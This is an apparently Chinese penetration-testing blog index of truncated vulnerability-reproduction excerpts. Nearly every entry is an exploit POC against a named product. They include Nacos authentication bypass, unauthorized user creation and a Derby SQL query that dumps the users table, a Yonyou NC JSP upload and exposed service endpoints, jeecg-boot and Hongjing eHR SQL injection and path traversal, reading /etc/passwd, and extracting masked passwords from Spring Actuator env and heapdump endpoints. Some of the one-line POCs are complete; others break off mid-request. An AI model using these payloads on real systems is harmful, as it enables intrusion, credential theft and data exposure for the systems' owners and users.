随笔分类 - 渗透测试
摘要:漏洞复现: POC: POST /ispirit/interface/login.php HTTP/1.1 Host: ip Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows
阅读全文
摘要:影响范围: Nacos <= 2.0.0-ALPHA.1 漏洞复现: 检测漏洞是否存在 POC: /nacos/v1/auth/users?pageNo=1&pageSize=4 接下来可以尝试创建用户,useragent写成Nacos-Server POC: POST /nacos/v1/auth
阅读全文
摘要:影响范围: 0.1.0 <= Nacos <= 2.2.0 漏洞复现: POC: POST /nacos/v1/auth/users/login HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; r
阅读全文
摘要:漏洞复现: POC: /nacos/v1/cs/ops/derby?sql=select%20%2a%20from%20users
阅读全文
摘要:漏洞复现: 首先上传jsp POC: POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: IP User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, l
阅读全文
摘要:漏洞复现: POC: /uapws/index.jsp
阅读全文
摘要:漏洞复现: POC: /uapws/service
阅读全文
摘要:漏洞复现: POC: /uapws/service/nc.uap.oba.update.IUpdateService?wsdl
阅读全文
摘要:漏洞复现: POC: POST /uapws/soapFormat.ajax HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
阅读全文
摘要:影响范围: 3.0.0 <= jeecg-boot <= 3.5.3 2.4.x <= jeecg-boot <= 2.4.6 POC: POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1 Host: ip Pragma: no-cache Cach
阅读全文
摘要:漏洞复现: POC: POST /templates/attestation/../../servlet/DisplayFiles HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/
阅读全文
摘要:漏洞复现: poc: POST /templates/attestation/../../pos/roleinfo/pos_dept_post HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW
阅读全文
摘要:漏洞复现: 1、读取/etc/passwd http:url/servlet/OutputCode?path=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP 其中path字段加密通过下面工具来实现 工具地址:https://github.
阅读全文
摘要:适用范围:宏景eHR < 8.2 登录页面 查询cusername: /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2
阅读全文
摘要:一、查看加密星号信息(适用于数据库密码、ftp、ssh) 1.首先访问地址:http://url/actuator/env 出现一些配置信息,搜索带有****** 可以看到ftp的ip,username,password 2.接着访问http://url/actuator/heapdump 下载下来
阅读全文

浙公网安备 33010602011771号